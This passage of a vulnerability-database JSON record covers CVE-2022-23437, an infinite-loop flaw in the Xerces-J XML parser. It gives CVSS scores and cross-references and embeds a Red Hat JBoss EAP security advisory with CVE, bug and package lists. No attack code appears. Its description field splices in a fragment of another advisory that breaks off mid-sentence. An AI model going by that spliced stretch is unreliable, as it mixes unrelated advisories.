"vendor": "\u65e5\u7acb",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-002358"
},
{
"db": "NVD",
"id": "CVE-2022-23437"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "168638"
},
{
"db": "PACKETSTORM",
"id": "167424"
},
{
"db": "PACKETSTORM",
"id": "167423"
},
{
"db": "PACKETSTORM",
"id": "167422"
}
],
"trust": 0.4
},
"cve": "CVE-2022-23437",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2022-23437",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-412572",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2022-23437",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2022-23437",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-23437",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2022-23437",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202201-2238",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-412572",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2022-23437",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412572"
},
{
"db": "VULMON",
"id": "CVE-2022-23437"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-002358"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-2238"
},
{
"db": "NVD",
"id": "CVE-2022-23437"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "There\u0027s a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions. Xerces is an open source project for XML document parsing promoted by the Apache organization. Description:\n\nRed Hat Process Automation Manager is an open source business process\nmanagement suite that combines process management and decision service\nmanagement and enables business and IT users to create, manage, validate,\nand deploy process applications and decision services. \n\nSecurity Fix(es):\n\n* chart.js: prototype pollution (CVE-2020-7746)\n\n* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)\n\n* package immer before 9.0.6. After installing\nthe update, restart the server by starting the JBoss Application Server\nprocess. \n\nThe References section of this erratum contains a download link. You must\nlog in to download the update. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: Red Hat JBoss Enterprise Application Platform 7.4.5 security update on RHEL 7\nAdvisory ID: RHSA-2022:4918-01\nProduct: Red Hat JBoss Enterprise Application Platform\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:4918\nIssue date: 2022-06-06\nCVE Names: CVE-2020-36518 CVE-2021-37136 CVE-2021-37137\n CVE-2021-42392 CVE-2021-43797 CVE-2022-0084\n CVE-2022-0853 CVE-2022-0866 CVE-2022-1319\n CVE-2022-21299 CVE-2022-21363 CVE-2022-23221\n CVE-2022-23437 CVE-2022-23913 CVE-2022-24785\n====================================================================\n1. Summary:\n\nA security update is now available for Red Hat JBoss Enterprise Application\nPlatform 7.4 for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss EAP 7.4 for RHEL 7 Server - noarch, x86_64\n\n3. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. \n\nThis release of Red Hat JBoss Enterprise Application Platform 7.4.5 serves\nas a replacement for Red Hat JBoss Enterprise Application Platform 7.4.4\nand includes bug fixes and enhancements. See the Red Hat JBoss Enterprise\nApplication Platform 7.4.5 Release Notes for information about the most\nsignificant bug fixes and enhancements included in this release. \n\nSecurity Fix(es):\n\n* h2: Loading of custom classes from remote servers through JNDI\n(CVE-2022-23221)\n\n* jackson-databind: denial of service via a large depth of nested objects\n(CVE-2020-36518)\n\n* netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for\ndecompressed data (CVE-2021-37136)\n\n* netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may\nbuffer skippable chunks in an unnecessary way (CVE-2021-37137)\n\n* h2: Remote Code Execution in Console (CVE-2021-42392)\n\n* netty: control chars in header names may lead to HTTP request smuggling\n(CVE-2021-43797)\n\n* xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of\nstderr (CVE-2022-0084)\n\n* wildfly: Wildfly management of EJB Session context returns wrong caller\nprincipal with Elytron Security enabled (CVE-2022-0866)\n\n* undertow: Double AJP response for 400 from EAP 7 results in CPING\nfailures (CVE-2022-1319)\n\n* OpenJDK: Infinite loop related to incorrect handling of newlines in\nXMLEntityScanner (JAXP, 8270646) (CVE-2022-21299)\n\n* mysql-connector-java: Difficult to exploit vulnerability allows high\nprivileged attacker with network access via multiple protocols to\ncompromise MySQL Connectors (CVE-2022-21363)\n\n* xerces-j2: infinite loop when handling specially crafted XML document\npayloads (CVE-2022-23437)\n\n* artemis-commons: Apache ActiveMQ Artemis DoS (CVE-2022-23913)\n\n* Moment.js: Path traversal in moment.locale (CVE-2022-24785)\n\n* jboss-client: memory leakage in remote client transaction (CVE-2022-0853)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nBefore applying this update, back up your existing Red Hat JBoss Enterprise\nApplication Platform installation and deployed applications. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data\n2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way\n2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling\n2039403 - CVE-2021-42392 h2: Remote Code Execution in Console\n2041472 - CVE-2022-21299 OpenJDK: Infinite loop related to incorrect handling of newlines in XMLEntityScanner (JAXP, 8270646)\n2044596 - CVE-2022-23221 h2: Loading of custom classes from remote servers through JNDI\n2047200 - CVE-2022-23437 xerces-j2: infinite loop when handling specially crafted XML document payloads\n2047343 - CVE-2022-21363 mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors\n2060725 - CVE-2022-0853 jboss-client: memory leakage in remote client transaction\n2060929 - CVE-2022-0866 wildfly: Wildfly management of EJB Session context returns wrong caller principal with Elytron Security enabled\n2063601 - CVE-2022-23913 artemis-commons: Apache ActiveMQ Artemis DoS\n2064226 - CVE-2022-0084 xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of stderr\n2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects\n2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale\n2073890 - CVE-2022-1319 undertow: Double AJP response for 400 from EAP 7 results in CPING failures\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-23120 - Tracker bug for the EAP 7.4.5 release for RHEL-7\nJBEAP-23171 - (7.4.z) Upgrade HAL from 3.3.9.Final-redhat-00001 to 3.3.12.Final-redhat-00001\nJBEAP-23194 - Upgrade hibernate-validator from 6.0.22.Final-redhat-00002 to 6.0.23-redhat-00001\nJBEAP-23241 - [GSS](7.4.z) Upgrade jberet from 1.3.9 to 1.3.9.SP1\nJBEAP-23299 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00034 to 2.16.0.redhat-00042\nJBEAP-23300 - [GSS](7.4.z) Upgrade JBoss Remoting from 5.0.23.SP1 to 5.0.24.SP1\nJBEAP-23312 - (7.4.z) Upgrade WildFly Core from 15.0.8.Final-redhat-00001 to 15.0.12.Final-redhat-00001\nJBEAP-23313 - (7.4.z) Upgrade Elytron from 1.15.11.Final-redhat-00002 to 1.15.12.Final-redhat-00001\nJBEAP-23336 - (7.4.z) Upgrade Hibernate ORM from 5.3.25.Final-redhat-00002 to 5.3.26.Final-redhat-00002\nJBEAP-23338 - [GSS](7.4.z) Upgrade Undertow from 2.2.16 to 2.2.17.SP3\nJBEAP-23339 - [GSS](7.4.z) Upgrade wildfly-http-ejb-client from 1.1.10 to 1.1.11.SP1\nJBEAP-23351 - (7.4.z) Upgrade org.apache.logging.log4j from 2.17.1.redhat-00001 to 2.17.1.redhat-00002\nJBEAP-23353 - (7.4.z) Upgrade wildfly-transaction-client from 1.1.14.Final-redhat-00001 to 1.1.15.Final-redhat-x\nJBEAP-23429 - [PM](7.4.z) JDK17 Update Tested Configurations page and make note in Update release notes\nJBEAP-23432 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP04 to 3.0.0.SP05\nJBEAP-23451 - [PST] (7.4.z) Upgrade to FasterXML Jackson to 2.12.6.redhat-00001 and Jackson Databind to 2.12.6.1.redhat-00003\nJBEAP-23531 - [GSS](7.4.z) Upgrade Undertow from 2.2.17.SP3 to 2.2.17.SP4\nJBEAP-23532 - (7.4.z) Upgrade WildFly Core from 15.0.12.Final-redhat-00001 to 15.0.13.Final-redhat-00001\n\n7. Package List:\n\nRed Hat JBoss EAP 7.4 for RHEL 7 Server:\n\nSource:\neap7-activemq-artemis-2.16.0-9.redhat_00042.1.el7eap.src.rpm\neap7-h2database-1.4.197-2.redhat_00004.1.el7eap.src.rpm\neap7-hal-console-3.3.12-1.Final_redhat_00001.1.el7eap.src.rpm\neap7-hibernate-5.3.26-1.Final_redhat_00002.2.el7eap.src.rpm\neap7-hibernate-validator-6.0.23-1.Final_redhat_00001.1.el7eap.src.rpm\neap7-jackson-annotations-2.12.6-1.redhat_00001.1.el7eap.src.rpm\neap7-jackson-core-2.12.6-1.redhat_00001.1.el7eap.src.rpm\neap7-jackson-databind-2.12.6.1-1.redhat_00003.1.el7eap.src.rpm\neap7-jackson-jaxrs-providers-2.12.6-1.redhat_00001.1.el7eap.src.rpm\neap7-jackson-modules-base-2.12.6-1.redhat_00001.1.el7eap.src.rpm\neap7-jackson-modules-java8-2.12.6-1.redhat_00001.1.el7eap.src.rpm\neap7-jberet-1.3.9-1.SP1_redhat_00001.1.el7eap.src.rpm\neap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP05_redhat_00002.1.el7eap.src.rpm\neap7-jboss-remoting-5.0.24-1.SP1_redhat_00001.1.el7eap.src.rpm\neap7-jboss-server-migration-1.10.0-16.Final_redhat_00015.1.el7eap.src.rpm\neap7-jboss-xnio-base-3.8.7-1.SP1_redhat_00001.1.el7eap.src.rpm\neap7-log4j-2.17.1-2.redhat_00002.1.el7eap.src.rpm\neap7-netty-4.1.72-4.Final_redhat_00001.1.el7eap.src.rpm\neap7-netty-tcnative-2.0.48-1.Final_redhat_00001.1.el7eap.src.rpm\neap7-netty-transport-native-epoll-4.1.72-1.Final_redhat_00001.1.el7eap.src.rpm\neap7-snakeyaml-1.29.0-1.redhat_00001.2.el7eap.src.rpm\neap7-undertow-2.2.17-2.SP4_redhat_00001.1.el7eap.src.rpm\neap7-wildfly-7.4.5-3.GA_redhat_00001.1.el7eap.src.rpm\neap7-wildfly-elytron-1.15.12-1.Final_redhat_00001.1.el7eap.src.rpm\neap7-wildfly-http-client-1.1.11-1.SP1_redhat_00001.1.el7eap.src.rpm\neap7-wildfly-transaction-client-1.1.15-1.Final_redhat_00001.1.el7eap.src.rpm\neap7-xerces-j2-2.12.0-3.SP04_redhat_00001.1.el7eap.src.rpm\n\nnoarch:\neap7-activemq-artemis-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-cli-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-commons-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-core-client-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-dto-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-hornetq-protocol-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-hqclient-protocol-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-jdbc-store-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-jms-client-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-jms-server-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-journal-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-ra-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-selector-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-server-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-service-extensions-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-activemq-artemis-tools-2.16.0-9.redhat_00042.1.el7eap.noarch.rpm\neap7-h2database-1.4.197-2.redhat_00004.1.el7eap.noarch.rpm\neap7-hal-console-3.3.12-1.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-hibernate-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm\neap7-hibernate-core-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm\neap7-hibernate-entitymanager-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm\neap7-hibernate-envers-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm\neap7-hibernate-java8-5.3.26-1.Final_redhat_00002.2.el7eap.noarch.rpm\neap7-hibernate-validator-6.0.23-1.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-hibernate-validator-cdi-6.0.23-1.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-jackson-annotations-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm\neap7-jackson-core-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm\neap7-jackson-databind-2.12.6.1-1.redhat_00003.1.el7eap.noarch.rpm\neap7-jackson-datatype-jdk8-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm\neap7-jackson-datatype-jsr310-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm\neap7-jackson-jaxrs-base-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm\neap7-jackson-jaxrs-json-provider-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm\neap7-jackson-module-jaxb-annotations-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm\neap7-jackson-modules-base-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm\neap7-jackson-modules-java8-2.12.6-1.redhat_00001.1.el7eap.noarch.rpm\neap7-jberet-1.3.9-1.SP1_redhat_00001.1.el7eap.noarch.rpm\neap7-jberet-core-1.3.9-1.SP1_redhat_00001.1.el7eap.noarch.rpm\neap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP05_redhat_00002.1.el7eap.noarch.rpm\neap7-jboss-remoting-5.0.24-1.SP1_redhat_00001.1.el7eap.noarch.rpm\neap7-jboss-server-migration-1.10.0-16.Final_redhat_00015.1.el7eap.noarch.rpm\neap7-jboss-server-migration-cli-1.10.0-16.Final_redhat_00015.1.el7eap.noarch.rpm\neap7-jboss-server-migration-core-1.10.0-16.Final_redhat_00015.1.el7eap.noarch.rpm\neap7-jboss-xnio-base-3.8.7-1.SP1_redhat_00001.1.el7eap.noarch.rpm\neap7-log4j-2.17.1-2.redhat_00002.1.el7eap.noarch.rpm\neap7-netty-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-all-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-buffer-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-codec-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-codec-dns-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-codec-haproxy-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-codec-http-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-codec-http2-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-codec-memcache-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-codec-mqtt-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-codec-redis-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-codec-smtp-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-codec-socks-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-codec-stomp-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-codec-xml-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-common-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-handler-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-handler-proxy-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-resolver-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-resolver-dns-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-resolver-dns-classes-macos-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-tcnative-2.0.48-1.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-transport-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-transport-classes-epoll-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-transport-classes-kqueue-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-transport-native-unix-common-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-transport-rxtx-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-transport-sctp-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-netty-transport-udt-4.1.72-4.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-snakeyaml-1.29.0-1.redhat_00001.2.el7eap.noarch.rpm\neap7-undertow-2.2.17-2.SP4_redhat_00001.1.el7eap.noarch.rpm\neap7-wildfly-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm\neap7-wildfly-elytron-1.15.12-1.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-wildfly-elytron-tool-1.15.12-1.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-wildfly-http-client-common-1.1.11-1.SP1_redhat_00001.1.el7eap.noarch.rpm\neap7-wildfly-http-ejb-client-1.1.11-1.SP1_redhat_00001.1.el7eap.noarch.rpm\neap7-wildfly-http-naming-client-1.1.11-1.SP1_redhat_00001.1.el7eap.noarch.rpm\neap7-wildfly-http-transaction-client-1.1.11-1.SP1_redhat_00001.1.el7eap.noarch.rpm\neap7-wildfly-java-jdk11-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm\neap7-wildfly-java-jdk8-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm\neap7-wildfly-javadocs-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm\neap7-wildfly-modules-7.4.5-3.GA_redhat_00001.1.el7eap.noarch.rpm\neap7-wildfly-transaction-client-1.1.15-1.Final_redhat_00001.1.el7eap.noarch.rpm\neap7-xerces-j2-2.12.0-3.SP04_redhat_00001.1.el7eap.noarch.rpm\n\nx86_64:\neap7-netty-transport-native-epoll-4.1.72-1.Final_redhat_00001.1.el7eap.x86_64.rpm\neap7-netty-transport-native-epoll-debuginfo-4.1.72-1.Final_redhat_00001.1.el7eap.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n8. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-36518\nhttps://access.redhat.com/security/cve/CVE-2021-37136\nhttps://access.redhat.com/security/cve/CVE-2021-37137\nhttps://access.redhat.com/security/cve/CVE-2021-42392\nhttps://access.redhat.com/security/cve/CVE-2021-43797\nhttps://access.redhat.com/security/cve/CVE-2022-0084\nhttps://access.redhat.com/security/cve/CVE-2022-0853\nhttps://access.redhat.com/security/cve/CVE-2022-0866\nhttps://access.redhat.com/security/cve/CVE-2022-1319\nhttps://access.redhat.com/security/cve/CVE-2022-21299\nhttps://access.redhat.com/security/cve/CVE-2022-21363\nhttps://access.redhat.com/security/cve/CVE-2022-23221\nhttps://access.redhat.com/security/cve/CVE-2022-23437\nhttps://access.redhat.com/security/cve/CVE-2022-23913\nhttps://access.redhat.com/security/cve/CVE-2022-24785\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/\n\n9. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYp5qBdzjgjWX9erEAQgudg/+KIuaXQZawyOnSNF4IIR8WYnfcW8Ojsfk\n27VFNY6WCSn07IkzyDFuCLHsmUEesiJvpYssOx4CuX1YEmlF7S/KepyI6QDVC+BV\nhFAfaVE1gdrny1sqaS8k4VFE9rHODML1q2yyeUNgdtL4YGdOeduqOEn6Q6GS/rvh\n+8vCZFkFb9QKxxItc1xvxvU8kAomQun+eqr040IHuF0jAZfLI18/5vzsPqeQG+Ua\nqU4CG5FucVytEkJCnQ8Ci3QH3FCm/BPqotyhO3OAi1b5+db+fT+UqJpiuHYCsPcQ\n8DRKizi/ia6Rq5b/OTFodA8lo6U3nDIljJ7QcuADgGzX4fak+BxQNkQMfhS4/b01\n/yFU034PmQBTJpm0r5Vb4V4lBWzAi5QMDttI4wncuM3VGbxSoEEXzdzFHVzgoy1r\nqDGfJ1C5VnSJeLawDa6tGyndBiVga/PPgx0CoSIPsAYnjXYfJM1DsohUXppTL1k+\nz8W2UIoIGqycYdCm60uJ+qbzqLlODNXmXn154OJL3O/o6Nz7O+uqVt+WfaNnwO/Y\nwf85wHGjzLaOALZfly/fENQr5Aijb9WqavN3tbcipj6+F4D3OLJMOSap8+TOXF3C\nStEX/XQpQASMmemvHJr/8c9Fx6tumJ+hLI4EyXfNdlYFJFQY4l4J0X6+mH047B3G\nR+RN8v8nzXQ{m6\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-23437"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-002358"
},
{
"db": "VULHUB",
"id": "VHN-412572"
},
{
"db": "VULMON",
"id": "CVE-2022-23437"
},
{
"db": "PACKETSTORM",
"id": "168638"
},
{
"db": "PACKETSTORM",
"id": "167424"
},
{
"db": "PACKETSTORM",
"id": "167423"
},
{
"db": "PACKETSTORM",
"id": "167422"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-412572",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412572"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-23437",
"trust": 3.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/01/24/3",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "167423",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2022-002358",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202201-2238",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168638",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2022072056",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022012503",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022041946",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042289",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072096",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060838",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042544",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022071806",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0760",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1653",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2799",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "167422",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "167424",
"trust": 0.2
},
{
"db": "CNVD",
"id": "CNVD-2022-14709",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-412572",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-23437",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412572"
},
{
"db": "VULMON",
"id": "CVE-2022-23437"
},
{
"db": "PACKETSTORM",
"id": "168638"
},
{
"db": "PACKETSTORM",
"id": "167424"
},
{
"db": "PACKETSTORM",
"id": "167423"
},
{
"db": "PACKETSTORM",
"id": "167422"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-002358"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-2238"
},
{
"db": "NVD",
"id": "CVE-2022-23437"
}
]
},
"id": "VAR-202201-1553",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-412572"
}
],
"trust": 0.01
},
"last_update_date": "2025-05-17T19:52:22.430000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
